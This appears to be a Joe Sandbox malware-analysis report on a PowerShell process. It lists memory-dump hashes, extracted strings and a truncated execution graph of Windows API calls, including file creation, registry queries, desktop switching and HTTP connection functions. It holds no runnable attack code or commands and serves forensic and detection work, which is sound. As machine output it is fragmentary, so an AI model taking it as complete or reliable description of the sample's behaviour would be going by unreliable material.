• Snapshot File: hcaresult_3_2_7fd0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 8fea7c04ed062471e2d7ed9f8f0b06d78f10401de9302bd9cb79a9083170b6b9
• Instruction ID: 5519abab2d0212905b2421e0f1e8ac0d46ebd701a7a6e244eb85846d4be8ab7b
• Opcode Fuzzy Hash: 8fea7c04ed062471e2d7ed9f8f0b06d78f10401de9302bd9cb79a9083170b6b9
• Instruction Fuzzy Hash: B9F09673A052925F87228A3D9C44CABBFE99E96260319427BF804C7711D6318C04C760

Memory Dump Source
• Source File: 00000003.00000002.1946878925.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7270000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 7f3980840eb2892a7c7058868f4a5baf5313d7f02d402457891c046829d623ac
• Instruction ID: 278163e9e4e2d0ccc0bb2a21ebe8ee127def9dba4a7f987310751ba5b73041dc
• Opcode Fuzzy Hash: 7f3980840eb2892a7c7058868f4a5baf5313d7f02d402457891c046829d623ac
• Instruction Fuzzy Hash: 25F0C2712087D49FCB226B7C5C2558A7F759F432743000B9AE1E08FBE6CB255905C7E2

Memory Dump Source
• Source File: 00000003.00000002.1912035134.00000000043F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_43f0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 0e7d188c3f914eabbbcf7da06739a7b637b2a7be1020e7cd76e8725277f65a13
• Instruction ID: 4769f3453015fdedaa9bc21bafe7dba314cb386fcb50a8eedcec87e3b53d053e
• Opcode Fuzzy Hash: 0e7d188c3f914eabbbcf7da06739a7b637b2a7be1020e7cd76e8725277f65a13
• Instruction Fuzzy Hash: FA01E475E0424A8FCB40CF68D485AAEBFF1AF49214F604199D909DB762D631A981CF81

Memory Dump Source
• Source File: 00000003.00000002.1949696045.0000000007FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FD0000, based on PE: false
Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_7fd0000_powershell.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                    • Opcode ID: 624fb9d1fb4c9a9bdc84d0361f0283c509bb4241a6225a186b31f7f41404b1a0
                                                                                                                                                                                                    • Instruction ID: ce13f71faefc612b02a15e02fe2959a82f44e518353ead67546d55bc45523da8
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 624fb9d1fb4c9a9bdc84d0361f0283c509bb4241a6225a186b31f7f41404b1a0
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0AF01D36D105599FCB04DF94D8508EDBB75FF95310F518159E54537224EB30AA8ACBA0
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.1949696045.0000000007FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FD0000, based on PE: false
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_7fd0000_powershell.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                    • Opcode ID: 99e9031cb650287e238eb1e391d015a9a379e3f6392f2ba0fd4c360652687054
                                                                                                                                                                                                    • Instruction ID: a412dc62abe041d82706d64fd1dccf660e8efd4e0593b63178402f319b3b72f4
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 99e9031cb650287e238eb1e391d015a9a379e3f6392f2ba0fd4c360652687054
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 50E02631A5E1901FC7224339F848CDBBFB8DE8226970802EFF085DB162C160AC0CCB91
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.1912035134.00000000043F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043F0000, based on PE: false
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_43f0000_powershell.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                    • Opcode ID: 51497325f9d3a7004db4a5d549d32ea76cfb948af8badd31ed3bb090736c32a0
                                                                                                                                                                                                    • Instruction ID: da1f0a61f8bf549a8a22dfd66a03adae6a320c47e229ca48bf16998946fd285a
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 51497325f9d3a7004db4a5d549d32ea76cfb948af8badd31ed3bb090736c32a0
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 98F0A974E0020A8FC780DF68C485AAEBBF4FF49314F5051A9E509DB321E730A945CF91
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.1949696045.0000000007FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FD0000, based on PE: false
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_7fd0000_powershell.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                    • Opcode ID: e790379112083ac6f86f4250f539940299ca3a6bbb45bc505a58603e32747e51
                                                                                                                                                                                                    • Instruction ID: 8b0f551dd020d188c02195d06279d859aace3e9bc993a659feacdf80add36d75
                                                                                                                                                                                                    • Opcode Fuzzy Hash: e790379112083ac6f86f4250f539940299ca3a6bbb45bc505a58603e32747e51
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 54E04F39316424CFCA046BA9B01C4EDB7AAEF89676704005FF50EC3B42CB795CA287C5
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.1949696045.0000000007FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FD0000, based on PE: false
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_7fd0000_powershell.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                    • Opcode ID: 0e4717b7e4d65e07c16741405a32ef6e04b0164a32d1e202c93496bbad683f6b
                                                                                                                                                                                                    • Instruction ID: 2614d50386c93dd3dc7bf1956df3966ae62857dab67016e92201db08a0cc1a0b
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0e4717b7e4d65e07c16741405a32ef6e04b0164a32d1e202c93496bbad683f6b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 86E0EDF0E0430EAF8F84EFF994421BEBBF1EB48200F04856B9919E3340E6385A018F95
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.1949696045.0000000007FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FD0000, based on PE: false
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_7fd0000_powershell.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                    • Opcode ID: 3225c5066d896b134aa8a4d1bf2d8c20eb5566175e3b1e7f343e15c8ace4f551
                                                                                                                                                                                                    • Instruction ID: 76142cb728b6496c7d6b8aad73c224eb106102662efedc1845027e3f6eef1ef0
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3225c5066d896b134aa8a4d1bf2d8c20eb5566175e3b1e7f343e15c8ace4f551
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 38E0207240A2C95EC712DB74D8116E97FB4CF11151F1881FBDC40C2102D1288714C7A2
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.1946878925.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_7270000_powershell.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                    • Opcode ID: 9c77027bd19bd83e35b5e333c0e23da4e8d017afd8fac529c59ff95bd78b03fd
                                                                                                                                                                                                    • Instruction ID: c600c61b4ec466cc75ab6bf8221b9b3e33eef6f75cac760ba88f1221e76d0b2c
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9c77027bd19bd83e35b5e333c0e23da4e8d017afd8fac529c59ff95bd78b03fd
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3DE092702007185BCA307BAD9C0A54FBA66AF427B87100728F2B15FBE4CB72A80187D1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.1949696045.0000000007FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FD0000, based on PE: false
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_7fd0000_powershell.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                    • Opcode ID: 5b04f6dcf224a32776e151bcb7ac9d30a4d16009f598d7e1a6e7440d31fd24f7
                                                                                                                                                                                                    • Instruction ID: e475c3631fec081c0a41a959b1c3493a7c9b09d2cd27abd657b10fd40ef3752a
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5b04f6dcf224a32776e151bcb7ac9d30a4d16009f598d7e1a6e7440d31fd24f7
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D0E0B6B4D0420E9F8F48DFB994421BEFBF5AB08200F00856E9819E3300E6395A018F95
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.1949696045.0000000007FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FD0000, based on PE: false
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_7fd0000_powershell.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                    • Opcode ID: 0e70b808b302a57ff418c6aa1d3d9aa8459635d4ddfaa3be9a5bd8ce5d2a2b93
                                                                                                                                                                                                    • Instruction ID: 019c04b96f202bc247b33dcd9d7ab9f778f0ddb68efe2d0f6f8f2de087da6853
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0e70b808b302a57ff418c6aa1d3d9aa8459635d4ddfaa3be9a5bd8ce5d2a2b93
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9FD05E6A0483859BD30753B060183E17FAAC702212F0D00D6D0D587453858579868392
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.1949696045.0000000007FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FD0000, based on PE: false
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_7fd0000_powershell.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                    • Opcode ID: 1f532c333d58c88cdd7bfe991d724e475334b188f1d93be872f23ba0e71cc447
                                                                                                                                                                                                    • Instruction ID: c01ea0145a5c235fe3ea882a50cbd748647e3d2d90d95865c6f29ae247addbd1
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1f532c333d58c88cdd7bfe991d724e475334b188f1d93be872f23ba0e71cc447
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 95D01276300055DB8B015F56F8589BE7B69FF89222708402FF555C5011CB318471DB70
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.1949696045.0000000007FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FD0000, based on PE: false
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_7fd0000_powershell.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                    • Opcode ID: 6813e0a08b0e5494f14c558ac5e3988f44c569cf2d85408a00b2f6611cf93c98
                                                                                                                                                                                                    • Instruction ID: 70f377724876e0962494a0c1fad00376ac000a73fd9b72da2a32a796a5172f35
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6813e0a08b0e5494f14c558ac5e3988f44c569cf2d85408a00b2f6611cf93c98
                                                                                                                                                                                                    • Instruction Fuzzy Hash: DDD09EB084110ACBDB10DF80C2197AE7B71AB00345F2C0815D006B6180DBB55E55DB91
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.1949696045.0000000007FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FD0000, based on PE: false
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_7fd0000_powershell.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                    • Opcode ID: ce3e1b22bdf5226e7c1b25707cb715c50e20c5446f5ddf12c402101b312ea83f
                                                                                                                                                                                                    • Instruction ID: 1b1f3c05df68a4202f19eb498e2a952b887093c7351a3fdfa7eaf4a9b7d24c35
                                                                                                                                                                                                    • Opcode Fuzzy Hash: ce3e1b22bdf5226e7c1b25707cb715c50e20c5446f5ddf12c402101b312ea83f
                                                                                                                                                                                                    • Instruction Fuzzy Hash: F4B092310082526ADA8156619808B2BBEA4AF91382F00840AB6C8800A1C12080A4DB22
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.1946878925.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_7270000_powershell.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID: 4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                                                                                                                    • API String ID: 0-2322485398
                                                                                                                                                                                                    • Opcode ID: ccfd0099acf11bd77c7c269397b4e322b7aa7de1775139741924e54517441d7c
                                                                                                                                                                                                    • Instruction ID: 1db9e90ca970fd6b202d51431b67621132ae5941ac5360adf6856134733ce92d
                                                                                                                                                                                                    • Opcode Fuzzy Hash: ccfd0099acf11bd77c7c269397b4e322b7aa7de1775139741924e54517441d7c
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 45E16CB1B203978FCB25AB69961456ABBF5AF86310F2480ABD505CF352DF31CC45CBA1
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.1946878925.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_7270000_powershell.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID: 4'^q$4'^q$4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q
                                                                                                                                                                                                    • API String ID: 0-2378468523
                                                                                                                                                                                                    • Opcode ID: b35ebbbc46ce83ee3a32a8c8c1d74f15d3f06f9518dd2dbc45a658cc8b06c22b
                                                                                                                                                                                                    • Instruction ID: 88f895018815c547e1b464f74187532a4e1b93df693ea7adce27b6c17525195e
                                                                                                                                                                                                    • Opcode Fuzzy Hash: b35ebbbc46ce83ee3a32a8c8c1d74f15d3f06f9518dd2dbc45a658cc8b06c22b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: F5F126B2B24257CFC7298B699A0066ABBF2BFC5310F1884ABD445CF352DB35D845C7A1
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.1946878925.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_7270000_powershell.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID: tP^q$tP^q$$^q$$^q$$^q
                                                                                                                                                                                                    • API String ID: 0-578306960
                                                                                                                                                                                                    • Opcode ID: a103344842de32036ea72de9734a50b7e1af51ceae4d7f3bdc6e330801196d65
                                                                                                                                                                                                    • Instruction ID: 164a15ed6d6c0983e7d20635ac2583e4fcd7362440b516a15fd9ae335eeadbd8
                                                                                                                                                                                                    • Opcode Fuzzy Hash: a103344842de32036ea72de9734a50b7e1af51ceae4d7f3bdc6e330801196d65
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0C91ACB271435A8FC7298BA9990066ABBF6EFC6310F1484AFD545CF351CA31CC15C7A2
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.1946878925.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_7270000_powershell.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID: 4'^q$4'^q$$^q$$^q$$^q
                                                                                                                                                                                                    • API String ID: 0-3272787073
                                                                                                                                                                                                    • Opcode ID: e5f10c3215e747cafb066c4218ca5842273231274c0ecd7dc29df90d20b3b5c3
                                                                                                                                                                                                    • Instruction ID: fe5e312abc0c76f4411624b1997e2d011f4cd9902b465b3692ec91b028e414cf
                                                                                                                                                                                                    • Opcode Fuzzy Hash: e5f10c3215e747cafb066c4218ca5842273231274c0ecd7dc29df90d20b3b5c3
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 615136B172534B8FD7284A699A0877BBBA6AFC1710F28847FD545CB241DE35C885C361
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.1946878925.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_7270000_powershell.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID: tP^q$$^q$$^q$$^q$$^q
                                                                                                                                                                                                    • API String ID: 0-324510305
                                                                                                                                                                                                    • Opcode ID: 752e45d90644a381b9a4eaa834584b542e1d753e99007da48c8e11f4aae07b67
                                                                                                                                                                                                    • Instruction ID: f1d7df646c797b0038ceb796db2bf2393dcbea8b82ff5ef318ebed54bf4bf07f
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 752e45d90644a381b9a4eaa834584b542e1d753e99007da48c8e11f4aae07b67
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 362148F2A30297CFCB24AF55CA44D69B7F4AF81610F25415AE8049F351CB31DD14CBA1
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.1946878925.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_7270000_powershell.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID: tP^q$tP^q$$^q$$^q
                                                                                                                                                                                                    • API String ID: 0-263804196
                                                                                                                                                                                                    • Opcode ID: f6fa6ff8f61187b4d75a8a297c7508853f0a8975e9df4eeda577b27545be3164
                                                                                                                                                                                                    • Instruction ID: 643c5b48b3731374d898849ce163abd6231c0f84d198398f06c96a1eb71e0a26
                                                                                                                                                                                                    • Opcode Fuzzy Hash: f6fa6ff8f61187b4d75a8a297c7508853f0a8975e9df4eeda577b27545be3164
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1B815571B10215AFCB249B6AD914B6AFBE2AFC5710F24C06AE805DF391CE72DC41C7A1
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.1946878925.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_7270000_powershell.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID: $^q$$^q$$^q$$^q
                                                                                                                                                                                                    • API String ID: 0-2125118731
                                                                                                                                                                                                    • Opcode ID: 385831850c921075e4e3f5fd8a1f143c67ccde367643aa4df39c7e4aa8f4d449
                                                                                                                                                                                                    • Instruction ID: ad9d35bcb36a34645f90dc3f49058a05973f8bb5f689fe8c44fb1c5ce0a7459d
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 385831850c921075e4e3f5fd8a1f143c67ccde367643aa4df39c7e4aa8f4d449
                                                                                                                                                                                                    • Instruction Fuzzy Hash: DB2105B273030B9BD7245A3E9E00B6BB6F69BC1721F24C43AA50ACB385DD75D941C3A1
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.1946878925.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_7270000_powershell.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID: 4'^q$4'^q$$^q$$^q
                                                                                                                                                                                                    • API String ID: 0-2049395529
                                                                                                                                                                                                    • Opcode ID: d0afeb733ee23cf62754204f8021db42c6a0afd17fd6abd5cabdc52a33eda2cd
                                                                                                                                                                                                    • Instruction ID: 19dcf14f419c7774fb16e324639368759bf8121e8a1bb7dc5f11a137fe46a619
                                                                                                                                                                                                    • Opcode Fuzzy Hash: d0afeb733ee23cf62754204f8021db42c6a0afd17fd6abd5cabdc52a33eda2cd
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9E01B161A193964FC73B12281A204A66FB25BC3A1031900DBC041DF396CE744C4EC3B3

                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                     Execution Coverage: 4.6%
                                                                                                                                                                                                     Dynamic/Decrypted Code Coverage: 0%
                                                                                                                                                                                                     Signature Coverage: 7.3%
                                                                                                                                                                                                     Total number of Nodes: 2000
                                                                                                                                                                                                     Total number of Limit Nodes: 101
execution_graph: interactive node/edge listing (2000 nodes per the count above) not reproduced here; the export is cut off mid-listing at edge 96287->96240. The recoverable content is the Win32 API labels attached to the graph nodes, grouped below by the function start addresses the graph attaches them to. CRT-internal labels (__getptd_noexit, std::locale::_Init, ___lock_fhandle, "N API calls" summaries) are omitted.

687e1dfc, 687ec840 (CRT startup in the 687e0000 module): GetSystemTimeAsFileTime, GetCurrentProcessId, GetCurrentThreadId, GetTickCount, QueryPerformanceCounter; HeapCreate; TlsGetValue, TlsSetValue, DecodePointer; GetCommandLineA, GetCommandLineW; RtlAllocateHeap; Sleep.
1110c6b0, 1110c650, 1110d060, 1110cba0, 11026ec0, 111731d2, 1116dec8: InitializeCriticalSection, InitializeCriticalSectionAndSpinCount, EnterCriticalSection, LeaveCriticalSection, GetCurrentThreadId, CreateEventA.
11141510, 11141430, 11141240, 11140ce0: ExpandEnvironmentStringsA, GetModuleFileNameA, SHGetFolderPathA (two calls), GetFileAttributesA, CreateDirectoryA, GetLastError, Sleep.
1115e4d1, 1116a559 (CRT fault reporting): IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetCurrentProcess, TerminateProcess. 1115edc1: RaiseException.
111756db (CRT open): CreateFileA (three sites), GetFileType, CloseHandle, GetLastError. 1115f3b5: HeapFree. 1116c936: RtlAllocateHeap, DecodePointer.
11030444, 1103040d, 11030696: GetModuleHandleA, GetProcAddress, GetNativeSystemInfo; GetStockObject, GetObjectA; SetErrorMode (twice); InterlockedExchange; GetACP. 1110c420: wsprintfA.
11105d40: OpenEventA, GetSystemDirectoryA, LoadLibraryA, GetProcAddress (twice), FreeLibrary, GetStockObject, GetObjectA, InitializeCriticalSection (twice), CloseHandle. 111042a0: LoadLibraryA (twice).
11141710: GetVersionExA, RegOpenKeyExA, RegQueryValueExA, RegCloseKey.
1109dcf0: GetCurrentProcess, OpenProcessToken, CloseHandle.
1110c2b0, 1110c520, 1110c580, 1110c370: CreateEventA, CreateThread, WaitForSingleObject, CloseHandle, InterlockedIncrement, InterlockedDecrement, SetEvent, PulseEvent.
1110cd70: GetCurrentThreadId, WaitForSingleObject, PostMessageA, PostThreadMessageA.
11026ee0, 110883c0: UnhookWindowsHookEx, CreateEventA, WaitForMultipleObjects, PostMessageA, SetEvent, Sleep, GetCurrentThreadId, GetThreadDesktop, SetThreadDesktop, CloseDesktop, CloseHandle.
1102c030: WaitForSingleObject, GetTickCount, CloseHandle.
110ffe60: GetCurrentThreadId, GetThreadDesktop, OpenDesktopA, SetThreadDesktop, CloseDesktop, GetLastError.
11029230: LoadLibraryA, then GetProcAddress nodes leading to InternetOpenA, InternetConnectA, HttpOpenRequestA and InternetCloseHandle, each with SetLastError/GetLastError branches, and FreeLibrary on exit. 110274c0, 11027510: GetProcAddress, SetLastError.
11080a30, 11080b10: IsDBCSLeadByte.
96287->96241 96287->96242 96287->96243 96287->96246 96287->96248 96287->96249 96287->96250 96287->96251 96287->96261 96287->96262 96287->96267 96287->96268 96287->96269 96287->96274 96287->96275 96287->96276 96287->96281 96287->96284 96287->96288 96289 1102962c GetDesktopWindow 96287->96289 96288->96287 96288->96289 96289->96287 96290 1102963a GetProcAddress 96289->96290 96290->96287 96291 11029676 SetLastError 96290->96291 96291->96287 96292->96125 96293->96144 96401 110ce2f0 96294->96401 96297 110ce519 96298 110ce502 96303->96120 96304->96122 96310 110cf1bc 96309->96310 96311 110cf1d7 96310->96311 96312 110cf1c0 96310->96312 96325 110cdeb0 96311->96325 96354 110290f0 261 API calls 2 library calls 96312->96354 96319 110cf20e 96319->96220 96319->96221 96320 110cf1f7 96355 110290f0 261 API calls 2 library calls 96320->96355 96326 110cdeb9 96325->96326 96327 110cdebd 96326->96327 96328 110cded4 96326->96328 96356 110290f0 261 API calls 2 library calls 96327->96356 96330 110cded1 96328->96330 96331 110cdf08 96328->96331 96330->96328 96357 110290f0 261 API calls 2 library calls 96330->96357 96332 110cdf05 96331->96332 96333 110cdf26 96331->96333 96332->96331 96358 110290f0 261 API calls 2 library calls 96332->96358 96337 110cedc0 96333->96337 96338 110cedce 96337->96338 96339 110cedd2 96338->96339 96341 110cede9 96338->96341 96359 110290f0 261 API calls 2 library calls 96339->96359 96341->96341 96343 110cee1c 96341->96343 96345 110cede6 96341->96345 96342 110cee90 96342->96319 96342->96320 96343->96342 96361 110ce710 96343->96361 96345->96341 96360 110290f0 261 API calls 2 library calls 96345->96360 96350 110cee4f _memmove 96350->96342 96351 110cee79 96350->96351 96373 110290f0 261 API calls 2 library calls 96351->96373 96362 110ce71d 96361->96362 96363 110ce738 96362->96363 96364 110ce721 96362->96364 96366 110ce735 96363->96366 96367 110ce756 96363->96367 96379 110290f0 261 API calls 2 library calls 96364->96379 96366->96363 96380 110290f0 261 API calls 2 library 
